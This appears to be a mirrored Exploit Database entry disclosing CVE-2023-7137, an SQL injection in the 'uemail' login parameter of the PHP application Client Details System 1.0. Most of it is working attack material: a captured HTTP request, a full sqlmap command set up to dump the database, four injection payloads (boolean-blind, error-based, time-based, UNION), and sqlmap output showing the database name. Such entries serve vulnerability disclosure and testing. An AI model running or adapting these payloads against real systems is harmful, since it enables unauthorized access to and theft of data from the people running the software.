Client Details System 1.0 – SQL Injection

• Exploit Database
• 132 阅读

• 作者： Hamdi Sevben
  日期： 2024-03-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51880/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70

  + **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1 + **Date:** 2023-26-12 + **Exploit Author:** Hamdi Sevben + **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/ + **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip + **Version:** 1.0 + **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53 + **CVE:** CVE-2023-7137   ## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140 + https://www.cve.org/CVERecord?id=CVE-2023-7137 + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137 + https://nvd.nist.gov/vuln/detail/CVE-2023-7137   ## Description: Client Details System 1.0 allows SQL Injection via parameter &apos;uemail&apos; in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data,or exploit latest vulnerabilities in the underlying database.   ## Proof of Concept: + Go to the User Login page: "http://localhost/clientdetails/" + Fill email and password. + Intercept the request via Burp Suite and send to Repeater. + Copy and paste the request to a "r.txt" file. + Captured Burp request: </code><code> POST /clientdetails/ HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 317 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/clientdetails/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36   uemail=user@mail.com&login=LOG+IN&password=P@ass123 </code><code> + Use sqlmap to exploit. In sqlmap, use &apos;uemail&apos; parameter to dump the database. </code><code> python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db </code><code> </code><code> --- Parameter: uemail (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: uemail=user@mail.com&apos; OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123   Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: uemail=user@mail.com&apos; AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123   Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uemail=user@mail.com&apos; AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123   Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: uemail=user@mail.com&apos; UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123 --- [14:58:11] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.53, PHP, PHP 8.1.6 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [14:58:11] [INFO] fetching current database current database: &apos;loginsystem&apos; </code><code> + current database: <code>loginsystem